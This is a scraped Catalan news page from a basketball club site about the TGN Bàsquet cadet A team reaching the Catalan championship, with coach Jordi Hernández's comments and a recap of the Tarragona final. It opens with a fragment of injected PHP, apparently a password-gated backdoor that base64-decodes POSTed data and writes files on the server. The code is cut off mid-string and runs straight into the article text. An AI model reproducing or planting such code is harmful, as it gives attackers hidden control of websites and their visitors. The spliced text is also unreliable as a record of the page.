function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El cadet masculí A, a l'assalt del Campionat de Catalunya - Tgn Bàsquet Club -

El cadet masculí A, a l’assalt del Campionat de Catalunya

By
Updated: juny 3, 2015

Està molt a prop, la glòria és a tocar. El cadet masculí A del TGN Bàsquet lluitarà aquest pròxim diumenge per aconseguir el campionat de Catalunya territorial de nivell A a Sant Feliu de Guíxols. El conjunt que entrena Jordi Hernández (juntament amb Pau Robert i Rafa Afan) jugarà la primera semifinal contra el Girona B (10.30 h) i, si guanya, jugarà la gran final (18 h) contra el guanyador del matx entre el Balaguer i el Mataró. El tècnic lila confia amb els seus jugadors, a qui coneix de fa tres temporades i destaca la gran capacitat de treball que tenen: “És la tercera temporada que els entreno i saben què vull d’ells. Els meus jugadors són addictes a l’entrenament. Ells entenen perquè han d’entrenar perquè saben que després els resultats es veuen durant els partits. S’ha de tenir en compte que aquest equip ha estat campió de mini, campió de preinfantil, va jugar a A1 sent infantils i guanyant molts partits, enguany ha estat campió de la demarcació  i ara anem al Campionat de Catalunya…És un equip guanyador”.

Hernández destaca la capacitat de superació d’un grup que ha anat millorant a mesura que avançava la temporada. “El 90% de l’equip és de primer any. A la primera volta vam patir perquè hi havia equips de segon any i l’evolució física i mental en aquestes edats és molt important. Però a la segona volta vam fer partits de molt nivell i vam estar a punt de guanyar equips que ara estan a interterritorial”, diu, mentre treu ferro a una possible derrota al Campionat de Catalunya: “Aquest cap de setmana seria la cirereta, si som campions, serà fantàstic i sinó, no passarà res”.

El cadet masculí A és un conjunt de jugadors molt treballadors que, a més, poden desenvolupar qualsevol funció dins la pista. Una de les seves principals característiques és el ritme frenètic que imposen en cada matx i la seva gran capacitat d’anotació. “La majoria de jugadors poden fer gairebé de tot. Hem treballat els grans perquè puguin jugar per fora i els petits perquè puguin jugar dins la zona. Són molt polivalents i, sobretot, són infatigables, corren i corren. El nostre joc és intentar fer el major nombre de tirs  possibles. De fet, en un partit, si haguéssim encistellat tot el que havíem llençat, hauríem fet 247 punts. Aquesta és la diversió: anotar i anotar. Una altra característica nostra és atacar des de la defensa”, explica Hernández.

Campió de la demarcació de Tarragona

L’equip lila jugarà el Campionat de Catalunya després de vèncer en la final del campionat de Tarragona l’Amposta (51-56) -en semifinals havia vençut l’ADT-, en un partit que va tenir dues meitats ben diferenciades. Així, els locals, amb un equip ple de jugadors molt alts, va dominar els primers vint minuts gràcies a la seva defensa en zona (2-3 i, curiosament, una 1-1-3). El ritme de l’Amposta va ser molt lent, un fet que dificultava el joc del TGN Bàsquet. Amb tot, un canvi tàctic de Jordi Hernández va capgirar la dinàmica: va situar una defensa 2-3 que, paradoxalment, va bloquejar l’atac local. Així, la sorpresa va ser total perquè els ampostins, que juguen en defensa en zona gairebé sempre, es van mostrar inoperants a l’hora d’atacar-la i el TGN Bàsquet va agafar les regnes del partit i, tot i fallar 22 tirs lliures, es va endur la final i el títol.

 

CGRpDuoXEAIW8gg

 

 

Deixa un comentari

L'adreça electrònica no es publicarà. Els camps necessaris estan marcats amb *